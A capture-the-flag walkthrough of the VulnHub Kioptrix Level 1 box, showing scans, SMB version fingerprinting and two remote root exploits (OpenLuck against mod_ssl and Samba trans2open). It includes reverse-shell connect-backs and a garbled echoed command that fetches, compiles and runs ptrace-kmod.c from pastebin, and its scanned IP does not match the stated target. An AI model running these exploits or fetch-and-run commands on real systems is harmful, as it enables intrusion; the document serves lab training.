VulnHub – Kioptrix Level 1 Walkthrough

This is a very old and quite popular beginner-friendly vulnerable box built for cybersecurity training. It can be considered an easy box, but because of the very old versions of the services running on it, installing and enumerating the box might be hard for a beginner. The box can be downloaded from the following link:

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

I used the VMWare version of the box. Before running the box, change the network option to NAT (or the one that your attack machine is on), and start hacking.

Overview

This overview shows the direct path to the solution of the vulnerable box Kioptrix Level 1 without giving the commands or tools used in the solution. An old Apache server with a vulnerable mod_ssl version is running on the machine. There is also an old, vulnerable SMB share. Both vulnerabilities allow remote code execution on the machine, which directly yields root access. The key to the box is identifying the service versions correctly and finding an exploit that works as intended.

This machine is listed in TJ Null's OSCP preparation list.

Detailed Walkthrough

My IP: 192.168.10.143

Machine IP: 192.168.10.129

Machine Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Enumeration

Start with a full-port nmap scan with version and OS detection:

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# nmap -T4 -p- -A 172.16.108.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-24 03:32 EDT
Nmap scan report for 172.16.108.129
Host is up (0.00035s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
|   1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_  1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32768/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-04-24T14:32:58+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_http-title: 400 Bad Request
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:C1:94:9E (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 7h00m04s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 172.16.108.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.37 seconds

This is a Linux machine. Several services are running on it: a web server, a Samba file share, SSH and RPC. There are two different attack vectors on this machine: the web server with its vulnerable mod_ssl version and the vulnerable SMB server. At this point the version of the SMB server is not clear; a more in-depth enumeration of the SMB share is given later in the article.

OpenLuck Vulnerability

When you browse to the web page served on the machine, you will see the default landing page.

Although nmap already shows the running version of the Apache web server, a 404 Not Found page also leaks the version information most of the time.

With a quick web search for mod_ssl/2.8.4, we can find that Apache with mod_ssl < 2.8.7 is vulnerable to the OpenF*ck exploit: https://www.exploit-db.com/exploits/21671

A buffer-overflow vulnerability has been reported in some versions of the OpenSSL.

The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.

https://www.exploit-db.com/exploits/21671
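As an added example (not part of the original walkthrough), here is a small Python check that parses the Server header exactly as nmap reported it and flags the components whose advertised version is older than the first fixed release; the thresholds (mod_ssl 2.8.7, OpenSSL 0.9.6d) are taken from the exploit titles on this page and are assumptions you should confirm against your own advisory source. The point of the tuple comparison is that a plain string comparison would rank 2.8.12 below 2.8.7 and miss or mis-flag hosts.

```python
import re

# Constructed input: the Server header value as nmap reported it for this box.
SERVER_HEADER = "Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"

# First fixed releases, taken from the exploit titles on this page
# (mod_ssl < 2.8.7, OpenSSL < 0.9.6d). Assumed; adjust to your advisory source.
FIXED_IN = {"mod_ssl": "2.8.7", "OpenSSL": "0.9.6d"}


def parse_version(text):
    """Turn '2.8.4' or '0.9.6b' into a sortable (numbers, letter-suffix) tuple.
    Comparing the raw strings would rank '2.8.12' below '2.8.7', so never do that."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]*)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(n) for n in m.group(1).split(".")), m.group(2)


def banner_components(header):
    """Extract product/version pairs (Apache/1.3.20, mod_ssl/2.8.4, ...) from a Server header.
    Tokens like 'Red-Hat/Linux' are skipped because the version must start with a digit."""
    return dict(re.findall(r"([A-Za-z_]+)/(\d[\w.]*)", header))


def assess_banner(header):
    """Return a list of findings for components older than their fixed release."""
    comps = banner_components(header)
    findings = []
    for product, fixed in FIXED_IN.items():
        if product in comps and parse_version(comps[product]) < parse_version(fixed):
            findings.append(f"{product} {comps[product]} is older than {fixed}")
    return findings


if __name__ == "__main__":
    for finding in assess_banner(SERVER_HEADER):
        print(finding)
```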

This is a very old exploit; so old that the tools to exploit it are themselves old and unstable on most modern systems. A version of the exploit that compiles and runs on current systems can be found here: https://github.com/heltonWernik/OpenLuck/blob/master/OpenFuck.c

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1/open_fuck]
└─# gcc openluck.c -o openluck -lcrypto

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1/open_fuck]
└─# ./openluck 0x6b 192.168.10.129 443 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt 
--12:06:19--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

12:06:19 (3.84 MB/s) - `ptrace-kmod.c' saved [4026]

ptrace-kmod.c:183:1: warning: no newline at end of file
[+] Attached to 2532
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root

We get root directly; it is very straightforward and no privilege escalation is needed. The same exploit can be found in the searchsploit database too:

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1/open_fuck]
└─# searchsploit mod_ssl     
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                             | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                  | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                  | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------

SMB Vulnerability

Since this is a very famous box, if you search for the other services and their versions, you will see this box showing up. However, you can also find the SMB server version running on the machine with plain enumeration.

I used crackmapexec, smbclient and enum4linux. None of them shows the version number. So there are two different things we can do to enumerate further: the Metasploit auxiliary scanner and/or a custom script.

msf6 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.10.129
RHOSTS => 192.168.10.129
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.10.129:139    - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.10.129:139    -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.10.129:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

It is Samba 2.2.1a. We can get the same information with the following custom script; see https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb#smb-server-version for details.

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# ./smbver.sh 192.168.10.129 
192.168.10.129: 
                                                                                                                                              
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# UnixSamba 221a

Or you can do it manually from the terminal. First, listen for SMB traffic coming from the target with tcpdump:

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# tcpdump -s0 -n -i eth0 src 192.168.10.129 and port 139 -A -c 7 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

Then start an SMB session with smbclient from another terminal:

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# smbclient -L 192.168.10.129
Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Password for [WORKGROUP\root]:

The captured packets contain the version information; the last packet shown below carries the strings Unix, Samba 2.2.1a and MYGROUP (tcpdump -A prints the NUL separators as dots):

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# tcpdump -s0 -n -i eth0 src 192.168.10.129 and port 139 -A -c 7 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
07:24:13.728707 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [S.], seq 1984819329, ack 168727235, win 5792, options [mss 1460,sackOK,TS val 4047323 ecr 1990541057,nop,wscale 0], length 0
E..<..@.@..[..
...
.....vM..
.......pR.........
.=..v.?.....
07:24:13.728969 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [.], ack 73, win 5792, options [nop,nop,TS val 4047323 ecr 1990541057], length 0
E..41Y@.@.s
..
...
.....vM..
..............
.=..v.?.
07:24:13.729453 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [P.], seq 1:5, ack 73, win 5792, options [nop,nop,TS val 4047323 ecr 1990541057], length 4
E..81Z@.@.s...
...
.....vM..
..............
.=..v.?.....
07:24:13.729970 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [P.], seq 5:94, ack 240, win 5792, options [nop,nop,TS val 4047323 ecr 1990541058], length 89
E...1[@.@.r...
...
.....vM..
........l.....
.=..v.?....U.SMBr...............................2.....................g..........,b....s.MYGROUP.
07:24:13.731014 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [P.], seq 94:165, ack 318, win 5792, options [nop,nop,TS val 4047324 ecr 1990541059], length 71
E..{1\@.@.r...
...
.....vM..
.......f......
.=..v.?....C.SMBs.....................l.d............Unix.Samba 2.2.1a.MYGROUP.
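To make the capture-based fingerprinting repeatable, here is an added Python parser (not from the original post) for the SMB1 SESSION_SETUP_ANDX response seen in the last packet above: it extracts the NativeOS, NativeLanMan and PrimaryDomain strings, honouring the Unicode flag in Flags2. Because the page does not include the raw bytes, the block also contains a constructed builder that produces a minimal response carrying the same Unix / Samba 2.2.1a / MYGROUP strings; its header field values (TID, PID, UID, MID) are arbitrary.

```python
import struct

NBSS_HDR = 4          # NetBIOS session service header: type byte + 3-byte length
SMB_HDR = 32          # fixed SMB1 header
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000


def parse_session_setup_response(pkt):
    """Return (NativeOS, NativeLanMan, PrimaryDomain) from a NetBIOS session
    message carrying an SMB1 SESSION_SETUP_ANDX response."""
    if len(pkt) < NBSS_HDR + SMB_HDR or pkt[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    smb = pkt[NBSS_HDR:NBSS_HDR + int.from_bytes(pkt[1:4], "big")]
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not an SMB1 SESSION_SETUP_ANDX message")
    flags2 = struct.unpack_from("<H", smb, 10)[0]
    word_count = smb[SMB_HDR]
    bc_off = SMB_HDR + 1 + 2 * word_count        # ByteCount follows the parameter words
    byte_count = struct.unpack_from("<H", smb, bc_off)[0]
    data_off = bc_off + 2
    data = smb[data_off:data_off + byte_count]
    if flags2 & FLAGS2_UNICODE:
        if data_off % 2:                          # pad byte aligns UTF-16 strings to 2 bytes
            data = data[1:]
        text = data[:len(data) & ~1].decode("utf-16-le", "replace")
    else:
        text = data.decode("latin-1")
    fields = text.split("\x00")
    if len(fields) < 3:
        raise ValueError("truncated NativeOS/NativeLanMan/PrimaryDomain block")
    return fields[0], fields[1], fields[2]


def build_sample_response(native_os, lanman, domain, unicode=False):
    """Constructed test data: a minimal SESSION_SETUP_ANDX response carrying the
    given strings, modelled on the 'Unix / Samba 2.2.1a / MYGROUP' capture."""
    flags2 = FLAGS2_UNICODE if unicode else 0
    hdr = (b"\xffSMB" + bytes([SMB_COM_SESSION_SETUP_ANDX]) + b"\x00" * 4 + b"\x88"
           + struct.pack("<H", flags2) + b"\x00" * 12      # PIDHigh, signature, reserved
           + struct.pack("<HHHH", 0, 1000, 100, 1))        # TID, PID, UID, MID (arbitrary)
    params = bytes([3, 0xFF, 0]) + struct.pack("<HH", 0, 0)  # WordCount=3, no AndX, Action
    strings = "".join(s + "\x00" for s in (native_os, lanman, domain))
    body = (b"\x00" + strings.encode("utf-16-le")) if unicode else strings.encode("latin-1")
    smb = hdr + params + struct.pack("<H", len(body)) + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    pkt = build_sample_response("Unix", "Samba 2.2.1a", "MYGROUP")
    print(parse_session_setup_response(pkt))   # ('Unix', 'Samba 2.2.1a', 'MYGROUP')
```

The same parser can be pointed at a real capture by feeding it the TCP payload of the server's Session Setup response, for example from a pcap saved with tcpdump -w.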

So we know this is Unix Samba 2.2.1a. With a quick search we can find that it is vulnerable to the Samba trans2open overflow, which gives us remote code execution as root on the machine: https://www.exploit-db.com/exploits/16861

Search the searchsploit database for the exploit source code:

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# searchsploit trans2                                  
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                                               | windows/dos/14607.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)                             | windows/dos/12273.py
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                                                | osx/remote/9924.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                                           | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)                                         | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                                           | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)                                     | solaris_sparc/remote/16330.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                                                  | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                                                  | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)  <<<=====                                        | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                                                  | unix/remote/22471.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Compile it and run it:

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# gcc trans2open.c -o trans2open

┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# ./trans2open  
Samba < 2.2.8 Remote Root exploit by Schizoprenic
Connect back method, Xnuxer-Labs, 2003.
Usage  : ./trans2open <type> <victim> <your_ip>
Targets:
         0 = Linux
         1 = FreeBSD/NetBSD
         2 = OpenBSD 3.0 and prior
         3 = OpenBSD 3.2 - non-exec stack

                                                                                                                                              
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# ./trans2open 0 192.168.10.129 192.168.10.143
[+] Listen on port: 45295
[+] Connecting back to: [192.168.10.143:45295]
[+] Target: Linux
[+] Connected to [192.168.10.129:139]
[+] Please wait in seconds...!
[+] Yeah, I have a root ....!
------------------------------
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

We can do the same with the Metasploit Framework. Strangely, Metasploit opens several sessions back to back, but it works seamlessly.

msf6 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.10.129   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   139              yes       The target port (TCP)


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.143   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce



View the full module info with the info, or info -d command.

msf6 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 192.168.10.143:4444 
[*] 192.168.10.129:139 - Trying return address 0xbffffdfc...
[*] 192.168.10.129:139 - Trying return address 0xbffffcfc...
[*] 192.168.10.129:139 - Trying return address 0xbffffbfc...
[*] 192.168.10.129:139 - Trying return address 0xbffffafc...
[*] 192.168.10.129:139 - Trying return address 0xbffff9fc...
[*] 192.168.10.129:139 - Trying return address 0xbffff8fc...
[*] 192.168.10.129:139 - Trying return address 0xbffff7fc...
[*] 192.168.10.129:139 - Trying return address 0xbffff6fc...
[*] Command shell session 9 opened (192.168.10.143:4444 -> 192.168.10.129:1039) at 2024-08-09 11:52:30 -0400

[*] Command shell session 10 opened (192.168.10.143:4444 -> 192.168.10.129:1040) at 2024-08-09 11:52:31 -0400
[*] Command shell session 11 opened (192.168.10.143:4444 -> 192.168.10.129:1041) at 2024-08-09 11:52:32 -0400
[*] Command shell session 12 opened (192.168.10.143:4444 -> 192.168.10.129:1042) at 2024-08-09 11:52:33 -0400
whoami
root

Conclusion & Comments

This is a very old machine that is in TJ Null's OSCP preparation list. The machine runs two critically vulnerable services: Samba and Apache. Sadly, this walkthrough shows only the tools and exploits and not an in-depth analysis of the buffer overflows that lead to the remote code execution. Both a Metasploit and a non-Metasploit solution for this machine are given in this walkthrough, as well as a very neat trick for SMB enumeration. Even though this is a very old box with no application in modern environments, it is still a very good exercise to solve. Last but not least, I recommend this box to everyone who wants to be an ethical hacker.

Also, there is a wonderful TCM Security video of this machine with very beginner-friendly tips: https://youtu.be/sH4JCwjybGs?si=LiRM6LwQDwC3tPo0&t=2284.

Other Notable Resources